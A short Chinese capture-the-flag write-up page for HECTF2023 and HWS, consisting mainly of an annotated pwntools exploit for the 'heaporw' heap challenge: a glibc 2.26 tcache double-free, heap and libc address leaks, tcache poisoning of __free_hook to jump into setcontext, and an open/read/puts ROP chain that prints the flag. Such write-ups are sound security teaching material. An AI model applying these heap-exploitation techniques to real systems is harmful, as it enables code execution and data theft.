HECTF2023 and HWS

HECTF AND HWS

magicode

alloc() 函数会多分配 0x10 字节

风水大狮

heaporw

爆破 glibc 基址，然后可以利用 `__free_hook` 进行 orw（open/read 读出 flag 再打印）

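from pwn import *

# pwntools context: 64-bit Linux target.  log_level='debug' dumps every byte
# sent/received, handy while tuning the heap layout below but very noisy —
# drop it to 'info' once the offsets are stable.
context(os='linux', log_level='debug', arch='amd64')

# The challenge ships glibc 2.26.  Its tcache has no double-free detection
# (the `key` check only arrived in 2.29), which is what the repeated
# delete() calls later in the script rely on.
libc = ELF("./libc-2.26.so")
elf = ELF("./pwn")

# 1 = run ./pwn locally, 0 = connect to the remote service.
# NOTE(review): the original read `if debug=1:` (a SyntaxError); fixed to `==`.
# NOTE(review): `def debug()` further down rebinds this same name to a
# function, so the flag is only meaningful on the line directly below.
debug = 1
if debug == 1:
    io = process('./pwn')
else:
    # 0.0.0.0:10003 is presumably a placeholder — replace with the real host/port.
    io = remote('0.0.0.0', 10003)

# Gadget offsets *relative to the libc base*; libc_base is added at the point
# of use (e.g. `pop_rdi + libc_base`).  They were taken from libc-2.26.so and
# must be re-derived (ROPgadget/ropper) if the libc build changes.
ret = 0x937
pop_rdi = 0x20b8b
pop_rsi = 0x20a0b
pop_rdx = 0x01b96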
def debug():
    """Attach gdb to the running target and block until the user resumes.

    NOTE(review): this rebinds the module-level ``debug`` flag (set above to
    choose local vs. remote) to a function.  The flag is consumed before this
    line runs, so it works, but the name collision is easy to trip over.
    """
    gdb.attach(io)
    pause()

def add(size, context=b'AAA', line=True):
    """Menu option 1: allocate a chunk of ``size`` bytes filled with ``context``.

    ``line=True`` sends the data via sendline() (trailing newline);
    ``line=False`` sends it raw, for payloads whose last byte matters.
    Note the parameter named ``context`` shadows pwntools' global ``context``
    inside this function.  Ends with a short sleep, presumably so the next
    helper does not race the server's next prompt.
    """
    send_data = io.sendline if line else io.send
    io.recvuntil(b'option:')
    io.sendline(b'1')
    io.recvuntil(b'size:')
    io.sendline(b'%d' % size)
    io.recvuntil(b'context:')
    send_data(context)
    sleep(0.5)

def delete(idx):
    """Menu option 2: free the chunk stored at slot ``idx``.

    Only the option/index dialogue is driven here; nothing is read back, the
    next helper's recvuntil() consumes the following prompt.  The exploit
    below frees the same slot repeatedly, so the target evidently does not
    clear a slot on free.
    """
    for prompt, answer in ((b'option:', b'2'), (b'index:', b'%d' % idx)):
        io.recvuntil(prompt)
        io.sendline(answer)

def show(idx):
    """Menu option 3: dump slot ``idx`` and return the raw bytes echoed back.

    Returns everything up to (excluding) the ``\\x00+----`` separator that
    ends the dump; callers slice 8-byte pointers out of it with u64().
    """
    end_marker = b'\x00+----'
    for prompt, answer in ((b'option:', b'3'), (b'index:', str(idx).encode())):
        io.recvuntil(prompt)
        io.sendline(answer)
    return io.recvuntil(end_marker, drop=True)


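# ---------------------------------------------------------------------------
# Stage 1: leak a heap address.
# One 0x58 allocation, then the same slot freed three times.  glibc 2.26's
# tcache has no double-free detection, so the chunk ends up in its own bin
# list pointing at itself; re-allocating it and clobbering only the first
# byte of the `next` field leaves a heap pointer that show() reads back.
# The +0xf000 rebases that pointer to the "heap" base all later offsets are
# relative to; it was taken from the author's gdb session — re-derive it if
# the binary or loader changes.
# ---------------------------------------------------------------------------
add(0x58, b"AAAA")
delete(0)
delete(0)
delete(0)
add(0x58, b"\x00", line=False)
heap = u64(show(0)[:8]) + 0xf000
flag_str = heap + 0x2a0   # where "./flag\0" is written below
flag_addr = heap + 0x3f0  # buffer that read() fills with the flag contents
rop_addr = heap + 0x310   # where the ROP chain is written below
delete(0)
print(hex(heap))

# ---------------------------------------------------------------------------
# Stage 2: tcache poisoning to find libc.
# Pull from the still double-freed bin three times: the first pull writes a
# fake `next` (heap+0x2a0), the second returns the same chunk again, and the
# third is served from heap+0x2a0 and receives "./flag".  That chunk is
# slot 2, assuming the target hands out the lowest free slot.
# ---------------------------------------------------------------------------
add(0x58, p64(heap + 0x2a0))
add(0x58, b"")
add(0x58, b"./flag\x00")
# What sits at slot 2 + 0x20 is not visible from this script; the author
# rebases it with raw gdb addresses (the difference is 0x2a0, plus 0x10).
# The write-up calls this step a brute-force of the glibc base, so the value
# is only sometimes usable — the range check below rejects anything outside
# the usual 0x7f... mmap/libc range.
res = u64(show(2)[0x20:0x28]) + (0x7fb0ac795000 - 0x7fb0ac794d60) + 0x10
print(hex(res))
if res < 0x7f0000000000:
    # NOTE(review): the original listing had `return True` here, which is a
    # SyntaxError at module level (the flow was evidently the body of a
    # function driven by a retry loop that is not part of this listing).
    # Abort instead and re-run until the leak passes the check.
    io.close()
    raise SystemExit("leak 0x%x is outside the expected range; re-run" % res)

# Poison the 0x60 bin again with `res` as the fake `next`: slot 1 is freed
# twice, the chunk is re-taken with `res` written into it, a second pull
# re-takes the same chunk, and the third pull is served from `res` itself
# (only a single NUL byte is written so the rest of it survives).  Offset
# 0x10 of that memory holds a libc pointer; 0x21570 is its offset inside
# libc-2.26.so (the 0x3c1a0 in the original's commented-out line is
# presumably from a different build).
delete(0)
delete(1)
delete(1)
print()
add(0x58, p64(res))
add(0x58, b'')
add(0x58, b'\x00', line=False)
libc_base = u64(show(3)[0x10:0x18]) - (0x7fc784a21570 - 0x7fc784a00000)
libc.address = libc_base

# ---------------------------------------------------------------------------
# Stage 3: __free_hook -> setcontext -> ROP (open/read/puts on ./flag).
# free(ptr) calls __free_hook(ptr) with rdi = ptr, and setcontext then loads
# registers from memory around rdi (glibc 2.26 x86_64 ucontext layout:
# rdi <- [rdi+0x68], rsi <- [rdi+0x70], rsp <- [rdi+0xa0], and [rdi+0xa8] is
# pushed and returned into).  The chunk that eventually gets freed is the
# 0x48 one allocated right below; the 0x6f payload chunk is allocated
# immediately after it, i.e. 0x50 bytes further up (assuming both come fresh
# from the top chunk), which is why the payload offsets 0x18/0x20/0x50/0x58
# are exactly 0x50 less than the setcontext offsets:
#   rdi = flag_str, rsi = 0 (O_RDONLY), rsp = rop_addr, rip = `ret` gadget.
# ---------------------------------------------------------------------------
delete(1)
delete(0)
delete(0)
payload = (
    b'\x00' * 0x18
    + p64(flag_str)          # -> rdi for open()
    + p64(0)                 # -> rsi: O_RDONLY
    + b'\x00' * 0x28
    + p64(rop_addr)          # -> rsp: pivot onto the chain below
    + p64(ret + libc_base)   # -> first return target, a plain `ret`
)
add(0x48, b'')
add(0x6f, payload)
delete(1)
delete(0)
# Poison the 0x60 bin so that the second pull after this one is served from
# __free_hook itself.
add(0x58, p64(libc.sym["__free_hook"]))

# The chain setcontext pivots to.  The author notes that open() zeroes rdx on
# the way, so rdx (the read length) is only loaded after open returns.  fd 3
# is assumed to be the descriptor open() hands back (0/1/2 already in use).
rop = b''
rop += p64(libc.sym['open'])
rop += p64(pop_rdx + libc_base) + p64(0x30)
rop += p64(pop_rdi + libc_base) + p64(3) + p64(pop_rsi + libc_base) + p64(flag_addr) + p64(libc.sym['read'])
# puts() rather than write(): per the author's note, write() touches a
# [rip+offset] location during the call that may be unmapped or unreadable
# here, whereas puts() only needs the buffer pointer in rdi.
rop += p64(pop_rdi + libc_base) + p64(flag_addr) + p64(libc.sym['puts'])[:-1]
# The last byte of the final address is dropped, so the chain is one byte
# shorter than the 0x58 request — presumably so it fits the target's read
# (TODO confirm against the binary).  Sent raw, without a newline.
add(0x58, rop, line=False)
# This pull is served from __free_hook: write the setcontext entry there.
# 0x4a865 is a raw libc-2.26 offset (presumably a setcontext+N entry that
# skips the floating-point restore); computing it as
# libc.sym['setcontext'] + N would make the dependency on the build explicit.
add(0x58, p64(libc_base + 0x4a865))
# Re-take the 0x48 chunk (slot 5 under lowest-free-slot allocation) so that
# freeing it hands its address to the hook as rdi.
add(0x48, b'\x00', line=False)
# debug()  # uncomment to attach gdb right before the hook fires
delete(5)

# Drain whatever is pending (the flag printed by puts) and hand over the tty.
io.recv()
io.interactive()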

Bit

明天复。。。